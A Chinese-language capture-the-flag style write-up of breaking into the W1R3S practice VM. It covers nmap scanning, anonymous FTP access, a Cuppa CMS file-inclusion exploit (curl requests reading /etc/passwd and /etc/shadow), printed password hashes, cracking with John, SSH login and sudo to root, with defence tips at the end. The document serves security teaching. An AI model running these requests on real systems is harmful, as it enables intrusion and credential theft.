w1res靶场渗透笔记
字数 939 2025-08-11 17:40:24
W1R3S靶场渗透教学文档
1. 信息收集阶段
1.1 主机发现
使用nmap进行主机发现:
nmap -sn 192.168.18.142/24
发现目标主机:
W1R3S.lan (192.168.18.216)
MAC Address: 00:0C:29:53:6C:C0 (VMware)
1.2 端口扫描
使用nmap进行端口扫描:
nmap -sS -sV -T4 -O 192.168.18.216
扫描结果:
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
3306/tcp open mysql MySQL (unauthorized)
1.3 端口脚本扫描
使用nmap脚本扫描:
nmap --script=vuln 192.168.18.216
重要发现:
- HTTP服务存在Slowloris DOS攻击漏洞(CVE-2007-6750)
- 发现WordPress登录页面(/wordpress/wp-login.php)
2. 漏洞发现与利用
2.1 FTP服务(21端口)渗透
- 匿名登录测试:
ftp 192.168.18.216
Name: anonymous
Password: (任意或留空)
成功登录后发现目录结构:
content/
docs/
new-employees/
- 下载文件:
mget *
获取的文件:
- 01.txt
- 02.txt
- 03.txt
- employee-names.txt
- worktodo.txt
- 文件分析:
- 02.txt内容解密:
01ec2d8fc11c493b25029fb1f47f39ce:This is not a password SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg== -> "It is easy, but not that easy.." - employee-names.txt内容:
Naomi.W - Manager Hector.A - IT Dept Joseph.G - Web Design Albert.O - Web Design Gina.L - Inventory Rico.D - Human Resources - worktodo.txt内容解密:
I don't think this is the way to root! we have a lot of work to do stop playing around....
2.2 Web服务(80端口)渗透
- 目录扫描:
发现重要路径:
/administrator/installation/
/index.html
-
识别CMS:
发现是Cuppa CMS,版本为Beta -
搜索漏洞:
searchsploit cuppa cms
发现文件包含漏洞(25971.txt)
- 漏洞利用:
文件包含漏洞位于:
/administrator/alerts/alertConfigField.php
利用方式:
curl --data-urlencode "urlConfig=/etc/passwd" http://192.168.18.216/administrator/alerts/alertConfigField.php
- 获取敏感信息:
- 获取/etc/shadow文件:
curl --data-urlencode "urlConfig=/etc/shadow" http://192.168.18.216/administrator/alerts/alertConfigField.php
提取的重要hash:
root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0
www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1
w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.
- 密码破解:
使用John the Ripper:
john hashdow
破解结果:
www-data (www-data)
computer (w1r3s)
2.3 SSH服务(22端口)渗透
使用破解的凭据登录:
ssh w1r3s@192.168.18.216
Password: computer
检查sudo权限:
sudo -l
结果:
User w1r3s may run the following commands on W1R3S.lan:
(ALL : ALL) ALL
3. 权限提升
由于w1r3s用户拥有ALL权限,可直接获取root权限:
sudo su
4. 渗透总结
4.1 FTP服务利用要点
- 匿名登录检查
- 文件下载与分析
- 敏感信息提取与解密
4.2 Web服务利用要点
- 目录扫描发现管理后台
- CMS版本识别与漏洞搜索
- 文件包含漏洞利用
- 敏感文件读取
- 密码hash提取与破解
4.3 SSH服务利用要点
- 使用破解的凭据尝试登录
- 检查sudo权限
4.4 整体渗透思路
- 信息收集(主机发现、端口扫描)
- 服务识别与漏洞搜索
- 漏洞利用与权限获取
- 权限提升
- 清除痕迹
5. 防御建议
- 禁用FTP匿名登录
- 及时更新CMS系统
- 修复文件包含漏洞
- 使用强密码策略
- 限制sudo权限
- 定期检查系统日志
6. 扩展学习
建议观看详细讲解视频:
「红队笔记」学渗透必打百台靶机实操精讲-W1R3S